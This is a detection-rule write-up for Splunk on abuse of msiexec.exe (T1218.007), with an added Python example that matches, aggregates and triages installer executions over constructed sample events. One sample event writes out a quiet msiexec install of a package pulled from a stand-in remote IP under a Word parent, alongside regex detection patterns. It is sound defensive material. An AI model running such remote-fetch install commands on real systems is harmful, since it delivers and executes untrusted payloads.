
Summary
The rule titled 'MSIExec.exe Execution' detects invocations of the Windows Installer component msiexec.exe, a signed system binary that threat actors abuse to install malware while blending in with legitimate software deployment. This behavior was observed in FlawedGrace campaigns and illustrates how attackers proxy execution through trusted system binaries to run payloads or establish persistence without tripping signature-based controls. The detection logic is written for Splunk and searches endpoint process telemetry for any execution of msiexec.exe, using a regular expression on the process image so that only the installer binary itself is matched rather than look-alike names. Matching events are aggregated with their timestamps, host, user account, and parent process details, giving analysts the context needed to triage each hit. Because msiexec.exe runs routinely on healthy Windows systems (the Windows Installer service itself and ordinary software installs), a match is a lead rather than a verdict: the parent process and command line, for instance an install from a remote URL or a quiet install spawned by an unusual parent, are what separate abuse from normal activity. The technique falls under the Defense Evasion tactic as System Binary Proxy Execution: Msiexec, MITRE ATT&CK technique T1218.007. Applied continuously to EDR process logs, the rule provides visibility into installer-based execution that would otherwise go unnoticed.
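The following is an added example, not the rule's own Splunk search or any code from the rule's authors. It reimplements the detection idea in Python so it can be run offline over constructed sample events: a case-insensitive, path-anchored regex selects msiexec.exe executions, the hits are aggregated per host and user with first/last timestamps, parent processes and command lines (the equivalent of a Splunk `stats ... by dest user`), and a separate triage step flags the signals an analyst would look at first. The event field names (`_time`, `dest`, `user`, `process_path`, `parent_process_name`, `process`) follow the Splunk Endpoint.Processes data model and are an assumption here; the sample events and the triage heuristics are constructed for illustration and are not part of the rule described on this page.

```python
import re
from collections import defaultdict

# Regex on the full image path: msiexec.exe preceded by a path separator or the
# start of the string, case-insensitive, anchored at the end so that look-alike
# names such as "notmsiexec.exe" or "msiexec.exe.bak" do not match.
MSIEXEC_RE = re.compile(r"(?:^|[\\/])msiexec\.exe$", re.IGNORECASE)

# Constructed sample EDR process-creation events (not real telemetry). Field
# names follow the Splunk Endpoint.Processes data model (an assumption here).
SAMPLE_EVENTS = [
    {"_time": "2024-02-09T10:00:01Z", "dest": "WS01", "user": "CORP\\alice",
     "process_path": "C:\\Windows\\System32\\msiexec.exe",
     "parent_process_name": "explorer.exe",
     "process": "msiexec.exe /i C:\\Users\\alice\\Downloads\\tool.msi"},
    {"_time": "2024-02-09T10:00:03Z", "dest": "WS01", "user": "NT AUTHORITY\\SYSTEM",
     "process_path": "C:\\Windows\\System32\\msiexec.exe",
     "parent_process_name": "services.exe",
     "process": "C:\\Windows\\system32\\msiexec.exe /V"},
    {"_time": "2024-02-09T10:05:00Z", "dest": "WS02", "user": "CORP\\bob",
     "process_path": "C:\\Windows\\SysWOW64\\MSIEXEC.EXE",
     "parent_process_name": "winword.exe",
     "process": "msiexec.exe /q /i http://203.0.113.10/update.msi"},
    {"_time": "2024-02-09T10:05:02Z", "dest": "WS02", "user": "CORP\\bob",
     "process_path": "C:\\Windows\\System32\\msiexec.exe",
     "parent_process_name": "cmd.exe",
     "process": "msiexec /quiet /i C:\\Users\\Public\\pkg.msi"},
    {"_time": "2024-02-09T10:06:00Z", "dest": "WS03", "user": "CORP\\carol",
     "process_path": "C:\\Tools\\notmsiexec.exe",
     "parent_process_name": "explorer.exe",
     "process": "notmsiexec.exe --help"},
]


def is_msiexec(event):
    """True when the event's process image path matches the msiexec.exe regex."""
    return MSIEXEC_RE.search(event.get("process_path", "")) is not None


def detect(events):
    """Aggregate matching executions per (host, user): count, first/last time,
    parent processes and command lines, mirroring a Splunk
    `stats count min(_time) max(_time) values(parent_process_name) values(process) by dest user`."""
    groups = defaultdict(lambda: {"count": 0, "first_time": None, "last_time": None,
                                  "parents": set(), "command_lines": set()})
    for ev in events:
        if not is_msiexec(ev):
            continue
        g = groups[(ev["dest"], ev["user"])]
        g["count"] += 1
        t = ev["_time"]  # ISO-8601 UTC strings sort lexicographically
        if g["first_time"] is None or t < g["first_time"]:
            g["first_time"] = t
        if g["last_time"] is None or t > g["last_time"]:
            g["last_time"] = t
        g["parents"].add(ev["parent_process_name"])
        g["command_lines"].add(ev["process"])
    return dict(groups)


# Triage heuristics for reviewing the aggregated hits. These are an added
# assumption for this example, not part of the rule described on the page.
REMOTE_SOURCE_RE = re.compile(r"(?i)\b(?:https?|ftp)://")
QUIET_FLAG_RE = re.compile(r"(?i)(?:^|\s)/(?:q|qn|quiet)\b")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def triage(event):
    """Return the indicator names raised by one matching event (empty = benign-looking)."""
    indicators = []
    if REMOTE_SOURCE_RE.search(event["process"]):
        indicators.append("remote_msi_source")   # package fetched from a URL
    if QUIET_FLAG_RE.search(event["process"]):
        indicators.append("quiet_install")       # no UI shown to the user
    if event["parent_process_name"].lower() in OFFICE_PARENTS:
        indicators.append("office_parent")       # installer spawned by a document
    return indicators


if __name__ == "__main__":
    for (host, user), g in sorted(detect(SAMPLE_EVENTS).items()):
        print(f"{host} {user}: {g['count']} execution(s), "
              f"{g['first_time']}..{g['last_time']}, parents={sorted(g['parents'])}")
    for ev in SAMPLE_EVENTS:
        if is_msiexec(ev):
            print(ev["dest"], ev["process"], "->", triage(ev) or ["no indicators"])
```

Run as a script it prints three aggregated groups (two on WS01, one on WS02) and the per-event indicators; the Word-spawned quiet install from a remote URL raises all three signals, the services.exe-launched `/V` instance (the Windows Installer service) raises none, and the `notmsiexec.exe` event is never matched. Anchoring the regex on the image path rather than substring-matching the command line is what keeps the last case out.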
Categories
- Windows
- Endpoint
- Cloud
Data Sources
- Process
- User Account
- Application Log
- Network Traffic
- File
ATT&CK Techniques
- T1218.007
Created: 2024-02-09